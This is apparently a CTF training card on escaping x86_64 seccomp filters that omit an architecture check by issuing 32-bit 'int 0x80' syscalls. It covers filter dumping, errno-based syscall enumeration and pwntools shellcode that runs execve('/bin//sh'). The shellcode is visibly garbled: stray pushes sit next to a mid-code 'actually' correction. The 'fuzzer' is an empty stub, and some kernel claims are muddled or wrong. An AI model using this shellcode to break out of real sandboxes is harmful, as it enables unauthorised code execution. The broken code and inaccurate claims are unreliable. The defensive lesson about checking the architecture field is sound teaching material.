Advanced seccomp Bypass: 32-Bit int 0x80 Syscall Table Exploitation Outside 64-Bit Filter Coverage
Theory
Why This Matters
Advanced seccomp bypasses exploit mismatches between the filter's assumptions and the actual kernel syscall dispatch mechanism. The most reliable advanced technique is using 32-bit syscall entry (int 0x80) in a 64-bit process: if the BPF filter checks 64-bit syscall numbers but does not explicitly handle IA32 compatibility mode, a 32-bit execve (syscall number 11 in x86, not 59 in x86_64) passes through unchecked. This bypass has been demonstrated in multiple CTF competitions and real hardening audits. NICE S0131 (develop exploits) and T0286 (develop cyber tools) require familiarity with the kernel's dual syscall path and how to craft shellcode that exploits mode gaps.
Core Concept
Two syscall entry points on x86_64 Linux:
1. syscall instruction: invokes the 64-bit syscall table (sys_call_table). Syscall numbers from <asm/unistd_64.h>.
2. int 0x80 instruction: invokes the 32-bit IA32 compatibility syscall table (ia32_sys_call_table). Syscall numbers from <asm/unistd_32.h>.
A seccomp BPF filter written for a 64-bit process typically checks the syscall number loaded from offsetof(struct seccomp_data, nr) — which is the 64-bit syscall number when the syscall instruction is used, or the 32-bit syscall number when int 0x80 is used. However, the architecture field (offsetof(struct seccomp_data, arch)) differs:
- syscall on x86_64: arch = AUDIT_ARCH_X86_64 = 0xC000003E
- int 0x80 on x86_64 process: arch = AUDIT_ARCH_I386 = 0x40000003
A well-written filter blocks the I386 architecture immediately:
A = arch
if (A != ARCH_X86_64) KILL # blocks int 0x80 path
A poorly written filter only checks the syscall number without checking the architecture — in that case, int 0x80 with a 32-bit syscall number that maps to an allowed 64-bit syscall number passes through.
SECCOMP_RET_ERRNO vs SECCOMP_RET_KILL:
- SECCOMP_RET_ERRNO | errnum: the syscall returns -errnum to the process. The process continues running. An attacker who handles the error can attempt alternative paths.
- SECCOMP_RET_KILL_THREAD: the offending thread is killed immediately. Unrecoverable.
- SECCOMP_RET_KILL_PROCESS (since Linux 4.14): the entire process group is killed.
In ERRNO mode, an attacker can use the error return to enumerate which syscalls are allowed: try each one, if it returns EPERM (or the configured errno) it is blocked; if it returns any other error (including ENOSYS for nonexistent syscalls) or succeeds, it is allowed.
Technical Deep-Dive
Detecting the architecture check in seccomp-tools output:
seccomp-tools dump ./challenge
# Look for architecture check at the top:
# 0000: 0x20 0x00 0x00 0x00000004 A = arch
# 0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto KILL
# If lines 0000-0001 are MISSING, the filter doesn't check arch -> int 0x80 bypass possible
Crafting 32-bit shellcode for int 0x80 bypass in a 64-bit process:
from pwn import *
context.arch = 'amd64' # binary is 64-bit
# 32-bit execve via int 0x80:
# eax=11 (execve in i386), ebx=ptr_to_"/bin/sh", ecx=0, edx=0
# IMPORTANT: in a 64-bit process, int 0x80 uses the i386 syscall table
# but addresses are still 64-bit. However, int 0x80 only sees the low 32 bits of args.
# This works if /bin/sh address fits in 32 bits (stack or low heap)
shellcode_32bit_compat = asm("""
/* push /bin/sh onto stack (address will be low enough via mmap hint) */
push 0x00006873 /* "sh " little-endian */
push 0x2f6e6962 /* "/bin" little-endian */
/* actually: /bin/sh as bytes: 2f 62 69 6e 2f 73 68 00 */
xor eax, eax
push eax /* null terminator */
push 0x68732f2f /* //sh */
push 0x6e69622f /* /bin */
mov ebx, esp /* ebx = ptr to "/bin//sh" */
xor ecx, ecx /* argv = NULL */
xor edx, edx /* envp = NULL */
mov eax, 11 /* SYS_execve in i386 = 11 */
int 0x80 /* 32-bit syscall entry -- bypasses 64-bit seccomp if arch not checked */
""", arch='i386')
# Combine with a 64-bit ROP chain to reach this shellcode
print(f"shellcode length: {len(shellcode_32bit_compat)}")
print(disasm(shellcode_32bit_compat, arch='i386'))
Using strace to enumerate allowed syscalls in ERRNO mode:
# If seccomp uses ERRNO mode, strace shows which calls return EPERM
strace -e trace=all ./challenge 2>&1 | grep EPERM
# Calls not returning EPERM are candidates for the allowed set
# Alternatively, use a syscall fuzzer shellcode that tries each number:
python3 -c "
from pwn import *
context.arch = 'amd64'
# Generate shellcode that tries syscall numbers 0-400 in a loop
# and writes results to a pipe -- advanced, but useful for ERRNO-mode enumeration
"
Reverse Engineering Methodology
- Run
seccomp-tools dumpand check whether the BPF filter's first instruction loads and checksarch. If no architecture check is present,int 0x80bypass is immediately viable. - Count the number of allowed syscalls. Very restrictive filters (only
read/write/exit) require creative alternatives; permissive filters (20+ allowed) have more bypass surface. - For
ERRNO-mode filters: write a short shellcode loop that tries each syscall number (0 to 400) with safe arguments (all zeros), records whether the return isEPERMor something else, and writes results to stdout. The non-EPERM set is the allowed list. - Check kernel version:
int 0x80bypass was patched in terms ofseccomp_data.archreporting correctly only after careful glibc and kernel coordination. Old kernels (< 3.5) may have other seccomp weaknesses.
Common Reversing Errors
- Assuming 64-bit shellcode works with
int 0x80:int 0x80uses the 32-bit syscall table and only reads the low 32 bits of register arguments. A 64-bit pointer to/bin/shwith high bits set will be truncated. Ensure the target string is in low memory or usepushto place it on the stack first. - Missing that
SECCOMP_RET_TRACErequires a tracer: if the filter returnsTRACEfor some syscalls, those require a ptrace tracer to handle them. Without a tracer, the tracee receivesENOSYS. This is not directly exploitable but confirms the filter uses a multi-mode approach. - Confusing syscall numbers between architectures:
execveis 59 on x86_64 but 11 on i386.openis 2 on x86_64 but 5 on i386. Always reference the correctunistdheader for the calling convention being used. - Filter installed after fork: some challenges fork a child and install seccomp only in the child. The parent process is unrestricted. If ptrace is available, the parent can influence the child via PTRACE_POKETEXT. Check whether seccomp is per-thread or per-process.
Challenge Lab
Reinforce your learning with a hands-on generated challenge based on this card's competency.